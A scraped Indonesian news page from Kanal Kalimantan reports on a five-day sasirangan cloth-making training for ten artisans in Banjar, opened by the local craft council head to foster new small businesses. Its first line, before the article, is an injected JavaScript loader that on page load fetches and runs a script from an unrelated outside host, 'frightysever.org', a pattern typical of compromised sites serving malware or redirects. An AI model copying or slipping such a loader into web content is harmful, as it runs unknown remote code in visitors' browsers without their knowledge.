(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Ketua Dekranasda Banjar Harapkan Pelatihan Sasirangan Beri Peluang UMKM Baru


KANALKALIMANTAN.COM, MARTAPURA– Ketua Dekranasda Kabupaten Banjar Hj.Nurgita Tiyas membuka pelatihan pembuatan kain sasirangan di Gedung Dekranasda Banjar, Selasa (15/2/2022).

Sasirangan merupakan kain kebangaan masyarakat Banjar secara meluas khususnya Kalimantan Selatan.

Gita menjelaskan pelatihan pembuatan kain sasirangan yang dilaksanakan lebih mengarah melahirkan pelaku usaha mikro baru agar bisa membantu perekonomian keluarga.

“Mudah-mudahan peserta yang mengikuti pelatihan ini dapat menyerap ilmu maupun pengetahuan seluk beluk pembuatan Sasirangan,” ujarnya.

 

Baca juga : Bupati Tanbu Lakukan Edukasi dan Motivasi bersama Anak Yatim 

Gita yang juga istri Bupati Banjar tersebut berharap adanya penggabungan Dinas Koperasi dengan Disperindag bisa lebih spesifik lagi mengawal dan melahirkan para Usaha Mikro Kecil Menegah (UMKM) baru.

Kepala Dinas Koperasi, Usaha Mikro, Perindustrian dan Perdagangan Banjar I Gusti Made Suryawati menyampaikan tujuan pelatihan ini adalah memberikan pengetahuan dan menambah wawasan kepada pelaku Industri Kecil Menengah (IKM) khususnya Sasirangan serta meningkatkan kemampuan SDM pengrajin di Kabupaten Banjar.

Made menyebut kegiatan berlangsung dari Selasa hingga Sabtu Tahun 2022 tetap menerapkan Prokes yang ketat.

“Peserta dari berbagai kecamatan berjumlah 10 orang yaitu dari Kecamatan Martapura 3 orang, Martapura Timur 2, Astambul 2, Mataraman 1 dan Simpang Empat 2, ” ucapnya.

 

Baca juga : HGB di Atas Lahan Pemko Banjarbaru, 32 Bangunan di Eks Pasar Bauntung Dibongkar

Di akhir pembukaan tersebut dilakukan penyerahan secara simbolis alat atau fasilitas pelatihan kepada dua orang peserta.

Narasumber atau instruktur yang membina peserta yakni Syahrani dari Shedma Sasirangan dan Arbain dari Dhika Sasirangan. (Kanalkalimantan.com/kk)

Reporter : kk
Editor : cell


Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

4 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

5 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

6 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

7 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

11 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

13 jam ago

This website uses cookies.